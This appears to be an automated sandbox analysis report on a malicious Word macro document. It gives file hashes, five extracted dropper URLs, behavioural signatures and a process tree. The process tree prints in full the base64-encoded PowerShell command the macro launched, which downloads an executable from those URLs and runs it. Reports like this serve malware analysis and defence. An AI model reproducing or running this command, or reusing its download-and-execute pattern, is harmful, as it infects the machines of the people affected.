Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    17-05-2024 17:41

General

  • Target

    50b03ddd9d427dd4bd675a1e9ef3f96b_JaffaCakes118.doc

  • Size

    235KB

  • MD5

    50b03ddd9d427dd4bd675a1e9ef3f96b

  • SHA1

    e9e66e092a735a5b81e317f90a0c54c31572a5de

  • SHA256

    2004c42b12642630ecfbb726add85ef100207f8bbf2f456b7be6d4b18b9b02d4

  • SHA512

    3eb234184d70c1fcce644f8973c0be955b9ef22d247ff6f5bc2b91ba1fbaeaf9626ff26be96c0f2c6e33fd67742df1bb55918a5bdfae570d3b6b5d34d3608866

  • SSDEEP

    3072:pXgQEjb2eWJlrqmHSrdPACn8CZ8myYvrBfiNKDzaJFUKc0UTE7yZRUV7RJeOzi8t:p377rFH9CZzyYDB6EDzYUTE7yZRVUi8t

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://marcelaquilodran.com/XDyss3V

exe.dropper

http://johnnycrap.com/gXXm0QU

exe.dropper

http://erickogm.com/BXkXAa1

exe.dropper

http://rmz-anticor.ru/IpeUQcngY

exe.dropper

http://u11123p7833.web0104.zxcs.nl/j97Hkz3U

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\50b03ddd9d427dd4bd675a1e9ef3f96b_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PoWersheLL.exe
      PoWersheLL -e JABpAGQARgBCAEkARgBTAD0AKAAnAHQARQBKAGEAJwArACcAYgBEACcAKwAnAHIANQAnACkAOwAkAGMAQgBCAHEAUABVAGMAegA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABUAFgATABmAGkAdwBXAG4APQAoACcAaAB0AHQAcAAnACsAJwA6AC8ALwBtAGEAJwArACcAcgBjAGUAJwArACcAbABhAHEAdQBpACcAKwAnAGwAbwAnACsAJwBkACcAKwAnAHIAYQAnACsAJwBuAC4AYwBvAG0AJwArACcALwBYACcAKwAnAEQAeQBzAHMAMwBWAEAAaAAnACsAJwB0AHQAcAA6AC8ALwBqAG8AaABuAG4AJwArACcAeQAnACsAJwBjACcAKwAnAHIAYQBwAC4AYwBvAG0ALwBnAFgAWABtADAAUQBVAEAAaAAnACsAJwB0AHQAJwArACcAcAA6AC8AJwArACcALwBlACcAKwAnAHIAaQBjAGsAbwBnAG0ALgBjAG8AbQAnACsAJwAvACcAKwAnAEIAJwArACcAWABrAFgAQQBhADEAQABoAHQAdABwADoAJwArACcALwAnACsAJwAvAHIAbQB6AC0AYQBuAHQAJwArACcAaQAnACsAJwBjAG8AcgAuAHIAJwArACcAdQAvACcAKwAnAEkAcABlAFUAUQBjAG4AZwAnACsAJwBZACcAKwAnAEAAaAAnACsAJwB0ACcAKwAnAHQAcAAnACsAJwA6AC8ALwB1ADEAMQAxACcAKwAnADIAMwAnACsAJwBwADcAOAAzADMALgB3ACcAKwAnAGUAJwArACcAYgAwACcAKwAnADEAJwArACcAMAA0AC4AegB4AGMAJwArACcAcwAnACsAJwAuAG4AbAAvAGoAOQA3AEgAawAnACsAJwB6ADMAJwArACcAVQAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABBAEsARgBhAFYAQgA9ACgAJwBsACcAKwAnAFYAegByAEYAOQAnACkAOwAkAGkAZgB3AHcATgBjAGoAIAA9ACAAKAAnADQAJwArACcAMAA1ACcAKQA7ACQARAAzAFcATwAyADYAPQAoACcAdwBjAEsARABzAEcAJwArACcAUwAnACkAOwAkAEgANQBmAFUASwBVAFoAWAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcACcAKwAkAGkAZgB3AHcATgBjAGoAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABhAEoAQwBKAGwARgA1ACAAaQBuACAAJABUAFgATABmAGkAdwBXAG4AKQB7AHQAcgB5AHsAJABjAEIAQgBxAFAAVQBjAHoALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAYQBKAEMASgBsAEYANQAsACAAJABIADUAZgBVAEsAVQBaAFgAKQA7ACQARgBVAGYARAB0AEEAMwA9ACgAJwBDAEoAJwArACcASwAwAEwAQgBCACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEgANQBmAFUASwBVAFoAWAApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEgANQBmAFUASwBVAFoAWAA7ACQAQgBpAHcASgBPAG4ANQA9ACgAJwBFADAAQQBPACcAKwAnAGoARwBsACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AE0AVQAzAGkATgA9ACgAJwBQAFYANwBSAEkAQwAnACsAJwA2ACcAKwAnAGQAJwApADsA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2592
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1760

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      970e43529eea6e8445abc64e46637362

      SHA1

      cdd1ef6ed9314f1d507f8b50ee2760eaef72f9a4

      SHA256

      7bf12e14aef992de6152c2dc579a58583a836f22e4c2cc98d464650ad443e725

      SHA512

      e3e4e2e13d29b5b36173d793fd20499180b92ae2dafa3f11a4e8e2239fe5088b79c6c80870c827aa522f8bc8b7572ff7a1ca96a7d9f7a186ec5a9f1818871951

    • memory/2968-20-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-137-0x000000007180D000-0x0000000071818000-memory.dmp

      Filesize

      44KB

    • memory/2968-19-0x0000000006C00000-0x0000000006D00000-memory.dmp

      Filesize

      1024KB

    • memory/2968-12-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-18-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-11-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-16-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-17-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-15-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-14-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-13-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-10-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-9-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-2-0x000000007180D000-0x0000000071818000-memory.dmp

      Filesize

      44KB

    • memory/2968-38-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-66-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-57-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-103-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-102-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-48-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-39-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-104-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-29-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-113-0x000000007180D000-0x0000000071818000-memory.dmp

      Filesize

      44KB

    • memory/2968-114-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2968-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2968-0-0x000000002F061000-0x000000002F062000-memory.dmp

      Filesize

      4KB